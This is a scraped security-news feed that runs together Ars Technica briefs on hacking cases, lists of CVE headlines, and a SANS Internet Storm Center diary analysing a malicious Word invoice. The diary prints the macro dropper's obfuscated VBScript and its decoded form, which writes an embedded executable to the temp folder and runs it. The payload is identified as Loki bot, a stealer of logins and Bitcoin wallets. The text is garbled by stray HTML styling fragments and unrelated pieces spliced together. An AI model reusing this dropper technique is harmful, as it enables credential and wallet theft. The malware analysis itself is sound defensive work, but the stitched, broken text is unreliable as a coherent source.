Images of Seleznev with stacks of cash were found on his laptop following his 2014 arrest in the Maldives. (credit: Department of Justice)

Russian hacker Roman Seleznev was sentenced to 27 years in prison today. He was convicted of causing more than $169 million in damage by hacking into point-of-sale computers.

Seleznev, aka "Track2," would hack into computers belonging to both small businesses and large financial institutions, according to prosecutors. He was arrested in the Maldives in 2014 with a laptop that had more than 1.7 million credit card numbers. After an August 2016 trial, Seleznev was convicted on 38 counts, including wire fraud, intentional damage to a protected computer, and aggravated identity theft.

The sentence is quite close to the 30 years that the government asked for. Prosecutors said Seleznev deserved the harsh sentence because he was "a pioneer" who helped grow the market for stolen credit card data and because he "became one of the most revered point-of-sale hackers in the criminal underworld."

Read 6 remaining paragraphs | Comments

Oracle WebCenter Sites CVE-2017-3554 Remote Security Vulnerability
Oracle FLEXCUBE Universal Banking CVE-2017-3535 Remote Security Vulnerability
Oracle Hospitality OPERA 5 Property Services CVE-2017-3552 Remote Security Vulnerability
Oracle MySQL Connectors CVE-2017-3590 Local Security Vulnerability
Multiple McAfee Products CVE-2017-4028 Local Code Injection Vulnerability

Enlarge / A script scanning the Internet for computers infected by DoublePulsar. On the left, a list of IPs Shodan detected having the backdoor installed. On the right are pings used to manually check if a machine is infected. (credit: Dan Tentler)

Security experts believe that tens of thousands of Windows computers may have been infected by a highly advanced National Security Agency backdoor. The NSA backdoor was included in last week's leak by the mysterious group known as Shadow Brokers.

DoublePulsar, as the NSA implant is code-named, was detected on more than 107,000 computers in one Internet scan. That scan was performed over the past few days by researchers from Binary Edge, a security firm headquartered in Switzerland. Binary Edge has more here. Separate mass scans, one done by Errata Security CEO Rob Graham and another by researchers from Below0day, detected roughly 41,000 and 30,000 infected machines, respectively. To remain stealthy, DoublePulsar doesn't write any files to the computers it infects. This design prevents it from persisting after an infected machine is rebooted. The lack of persistence may be one explanation for the widely differing results.


Read 5 remaining paragraphs | Comments

Pexip Infinity CVE-2017-6551 Remote Code Execution Vulnerability
QEMU 'hw/display/cirrus_vga_rop.h' Multiple Memory Corruption Vulnerabilities
ImageMagick CVE-2017-7943 Denial of Service Vulnerability
Cisco IOS XE Software CVE-2017-6615 Denial of Service Vulnerability
Cisco Firepower System Software CVE-2016-6368 Denial of Service Vulnerability

Enlarge / South Korea is deploying Lockheed Martin's THAAD missile defense system, and that's sparked the ire of the Chinese government, as well as military and "hacktivist" hacking groups, according to FireEye. (credit: US Army)

Chinese government officials have been very vocal in their opposition to the deployment of the Terminal High-Altitude Air Defense (THAAD) system in South Korea, raising concerns that the anti-ballistic missile system's sensitive radar sensors could be used for espionage. And according to researchers at the information security firm FireEye, Chinese hackers have transformed objection to action by targeting South Korean military, government, and defense industry networks with an increasing number of cyberattacks. Those attacks included a denial of service attack against the website of South Korea's Ministry of Foreign Affairs, which the South Korean government says originated from China.

FireEye's director of cyber-espionage analysis John Hultquist told the Wall Street Journal that FireEye had detected a surge in attacks against South Korean targets from China since February, when South Korea announced it would deploy THAAD in response to North Korean missile tests. The espionage attempts have focused on organizations associated with the THAAD deployment. They have included "spear-phishing" e-mails carrying attachments loaded with malware along with "watering hole" attacks that put exploit code to download malware onto websites frequented by military, government, and defense industry officials.

FireEye claims to have found evidence that the attacks were staged by two groups connected to the Chinese military. One, dubbed Tonto Team by FireEye, operates from the same region of China as previous North Korean hacking operations. The other is known among threat researchers as APT10, or "Stone Panda"—the same group believed to be behind recent espionage efforts against US companies lobbying the Trump administration on global trade. These groups have also been joined in attacks by two "patriotic hacking" groups not directly tied to the Chinese government, Hultquist told the Journal—including one calling itself "Denounce Lotte Group" targeting the South Korean conglomerate Lotte. Lotte made the THAAD deployment possible through a land swap with the South Korean government.

Read on Ars Technica | Comments

Oracle Sun ZFS Storage Appliance Kit (AK) CVE-2017-3621 Remote Security Vulnerability
Oracle FLEXCUBE Private Banking CVE-2017-3478 Remote Security Vulnerability
Oracle Automatic Service Request CVE-2017-3581 Local Security Vulnerability
Oracle Solaris Cluster CVE-2016-5551 Local Security Vulnerability
Oracle MySQL Server CVE-2017-3468 Remote Security Vulnerability
Oracle MySQL Server CVE-2017-3463 Remote Security Vulnerability
Oracle MySQL Server CVE-2017-3462 Remote Security Vulnerability
Oracle FLEXCUBE Private Banking CVE-2017-3473 Remote Security Vulnerability
CVE-2017-7192: Starscream library before 2.0.4 allows SSL pinning bypass
Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
Linux Kernel CVE-2017-7645 Multiple Denial of Service Vulnerabilities
Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability

Enlarge (credit: Confide)

A man in Michigan has sued Confide, a secure messaging app that is reportedly used by Republicans in the Trump White House, over allegations that the app isn’t nearly as secure when run on a desktop computer, as opposed to a mobile device.

While the app does prevent screenshots on mobile devices, the new lawsuit, which was filed in federal court in New York on Thursday, notes that the app fails to block screenshots on Windows. Similarly, the mac OS and Windows versions both allow for entire messages to be read all at once rather than line-by-line, as the mobile app does. The two desktop platforms also lack a key feature—notification of a screenshot.

"By failing to offer the protections it advertised, Confide not only fails to maintain the confidentiality of messages sent or received by desktop App users, but its entire user base," lawyers for the plaintiff, Jeremy Auman, wrote in their civil complaint.

Read 9 remaining paragraphs | Comments

Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability

Thanks to our readers, we get often interesting samples to analyze. This time, Frederick sent us a malicious Microsoft Word document called Invoice_6083.doc (which was delivered in a zip archive). I had a quick look padding:5px 10px"> viper Invoice_6083.doc padding:5px 10px"> viper Invoice_6083.doc virustotal -v [+] VirusTotal Report for bc922d7335a58ae4269bfd652d62f03e: [*] Detecting engines: +----------------------+------------------------------+ | Antivirus | Signature | +----------------------+------------------------------+ | Ad-Aware | Trojan.GenericKD.4881915 | | AegisLab | Troj.Ole2.Agent!c | | Arcabit | Trojan.Generic.D4A7DFB | | Avast | VBS:Agent-BRE [Trj] | | BitDefender | Trojan.GenericKD.4881915 | | Cyren | Trojan.OGWQ-7 | | ESET-NOD32 | VBS/Kryptik.FI | | Emsisoft | Trojan.GenericKD.4881915 (B) | | F-Secure | Trojan.GenericKD.4881915 | | Fortinet | VBS/Kryptik.GA!tr | | GData | Trojan.GenericKD.4881915 | | Kaspersky | HEUR:Trojan.OLE2.Agent.gen | | McAfee | W97M/Downloader | | McAfee-GW-Edition | W97M/Downloader | | MicroWorld-eScan | Trojan.GenericKD.4881915 | | NANO-Antivirus | Trojan.Script.NJRat.dzzenc | | Qihoo-360 | virus.vbs.qexvmc.1 | | Symantec | Trojan.Mdropper | | TrendMicro | TROJ_DROPPER.XXTWD | | TrendMicro-HouseCall | TROJ_DROPPER.XXTWD | | ZoneAlarm | HEUR:Trojan.OLE2.Agent.gen | +----------------------+------------------------------+ [*] 21 out of 56 antivirus detected bc922d7335a58ae4269bfd652d62f03e as malicious. [*]

A first behaviour is interesting: The document does not ask the user to enable macro if not enabled width:800px" />

A shell object is attached to the button Preview clearly width:400px" />

The OLE object is listed in the following screenshot as ObjectPool-_1554011838-Ole10Native padding:5px 10px"> viper Invoice_6083.doc padding:5px 10px"> gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(646174613D223839354332343138333343333333343432333334343234343033333434323434343234313438426438633165383032633165333165306264383862333438424538303343304331454431) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(4630424538384234343234313438393643323434303842453843314530303543314544343143303336433234333830334335384235434834643561393030303033303030303030303430303030303066666666303030306238303030303030303030303030303034303030303030303030303030303030303030303030303030) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(3030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030463030303030303030453146424130453030423430394344323142383031344343443231353436383639373332303730373236663637373236313664323036333631366536653666373432303632363532) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(3037323735364532303639364532303434344635333230364436463634363532453044304430413234303030303030303030303030303063636364373866653838616331366164383861633136616438384143313641443831443439354144383941433136414434424133344241443841414331364144384441303139414438) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(3941433136414433443332463341443842414331364144383841433136414438636163313661643831643438336164383961633136616438386163313761646337616331366164383164343835616439396163313661643364333266376164663361633136616433643332633861643839414331364144353236393633363838) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(3841433136414430303030303030303030303030303030353034353030303034433031303430303835303836433537303030303030303030303030303030304530303030333031304230313043303030303338303130303030413230383030303030303030303064653339303130303030313030303030303035303031303030) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(3030303430303030303130303030303030303230303030303530303031303030303030303030303035303030313030303030303030303030303230304130303030303430303030303030303030303030323030303038303030303031303030303031303030303030303030313030303030313030303030303030303030303031) ...(stuff delete)... gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(696E2E686578223A7069632E6E6F6465547970656456616C7565203D207374723A74656D70203D207069632E6E6F6465547970656456616C75653A77697468204372656174654F626A656374282241444F44422E53747265616D22293A2E74797065203D20313A2E6F70656E3A2E77726974652074656D703A2E73617665546F) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(46696C6520664E616D652C20323A2E636C6F73653A656E6420776974683A656E64207375623A736574207773203D204372656174654F626A6563742822575363726970742E5368656C6C22293A666E203D2077732E457870616E64456E7669726F6E6D656E74537472696E677328222574656D70252229202620225C746D702E) gdtyaqiopndghdliosndgaqponvc = gdtyaqiopndghdliosndgaqponvc dghdggaqiojdndgmnxlosjodpkdd(657865223A7361766546696C6520666E2C646174613A77732E52756E20666E3A777363726970742E736C65657020313030) ExecuteGlobal gdtyaqiopndghdliosndgaqponvc Function dghdggaqiojdndgmnxlosjodpkdd(gdtyaqiopndghdliosndgaqponvc) For y = 1 To Len(gdtyaqiopndghdliosndgaqponvc) Step 2 ml = ml CHRW(Clng(H Mid(gdtyaqiopndghdliosndgaqponvc, y, 2))) Next dghdggaqiojdndgmnxlosjodpkdd = ml End Function

The function dghdggaqiojdndgmnxlosjodpkdd parses the string by apair of characters and convert the hex values. Everything is appended into a long string passed to ExecuteGlobal(). The result padding:5px 10px"> data=895C241833C333442334424403344244424148Bd8c1e802c1e31e0bd88b348BE803C0C1ED1F0BE88B442414896C24408BE8C1E005C1ED41C036C243803C58B5CH4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F00000000E1FBA0E00B409CD21B8014CCD21546869732070726f6772616d2063616e6e6f742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000cccd78fe88ac16ad88ac16ad88AC16AD81D495AD89AC16AD4BA34BAD8AAC16AD8DA019AD89AC16AD3D32F3AD8BAC16AD88AC16AD8cac16ad81d483ad89ac16ad88ac17adc7ac16ad81d485ad99ac16ad3d32f7adf3ac16ad3d32c8ad89AC16AD5269636888AC16AD0000000000000000504500004C01040085086C570000000000000000E00003010B010C000038010000A2080000000000de39010000100000005001000000400000100000000200000500010000000000050001000000000000200A000004000000000000020000800000100000100000000010000010000000000000100000000000000000000000D08E0100640000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005001005c0000000000000000000000000000000000000000000000000000002E74657874000000F5360100001000000038010000040000000000000000000000000000200000602e72646174610000604000000050010000420000003c0100000000000000000000000000400000402e64617461000000245e080000A0010000020000007E0100000000000000000000000000400000c02e780000000000000020000000000A000020000000800100000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008b44240483f8027d08b864000000c2040083F8047D08B802000000C2040083F8087D08B804000000c2040083f8107d08b806000000c2040083F8207D08B808000000C2040083F8407D08B80A000000C204003D800000007D08B80C000000C204003D000100007D08B80E000000C204003D000200007d08b810000000c204003d000 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 data=split(data,H)(1) sub saveFile(fName,str) dim temp set xmldoc = CreateObject(Microsoft.XMLDOM) xmldoc.loadXml ?xml version=1.0? set pic = xmldoc.createElement(pic) pic.dataType = bin.hex pic.nodeTypedValue = str temp = pic.nodeTypedValue with CreateObject(ADODB.Stream) .type = 1 .open .write temp .saveToFile fName, 2 .close end with end sub set ws = CreateObject(WScript.Shell) fn = ws.ExpandEnvironmentStrings(%temp%) \tmp.exe saveFile fn,data ws.Run fn wscript.sleep 100

The key is to split the string data with the character H and use the second element. After the H, you can see the following characters 0x4D 0x5A which indicates the beginning of the malicious payload (MZ padding:5px 10px"> viper Invoice_6083.exe padding:5px 10px"> viper Invoice_6083.exe width:802px" />

It communicates with hxxp:// a Loki bot. It is known to steal logins from many applications and Bitcoin wallets from the infected computer).

To resume, the malicious document:

  • Does not automatically execute the malicious macro but ask the victim to execute it
  • Contains multiple layers of obfuscation
  • Drops a payload which is not downloaded from the wild Internet but stored (encoded) in the macro.

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. Creative Commons Attribution-Noncommercial 3.0 United States License.

Internet Storm Center Infocon Status